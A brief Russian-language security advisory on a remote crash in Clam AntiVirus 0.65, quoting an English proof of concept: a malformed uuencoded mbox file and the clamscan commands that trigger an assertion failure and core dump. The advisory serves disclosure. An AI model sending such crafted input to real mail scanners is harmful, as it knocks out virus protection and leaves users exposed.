Программа: Clam AntiVirus 0.65 

Уязвимость обнаружена в Clam AntiVirus. Удаленный пользователь может аварийно завершить работу программы.  
Удаленный пользователь может послать email сообщение, содержащее uuencoded строку с некорректным значением длины через email сообщение, чтобы аварийно завершить работу антивируса. 

Пример: 

>How-To-Repeat:

Save the following file to ~/clamtest.mbox, removing the leading 'X':

XFrom -

Xbegin 644 byebye
Xbyebye
Xend

Then do:

# clamscan --mbox -v ~/clamtest.mbox
assertion "(len >= 0) && (len <= 63)" failed: file "message.c", lin
e 887
Abort (core dumped)

or

# clamdscan -v ~/clamtest.mbox; ps ax | grep clam

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии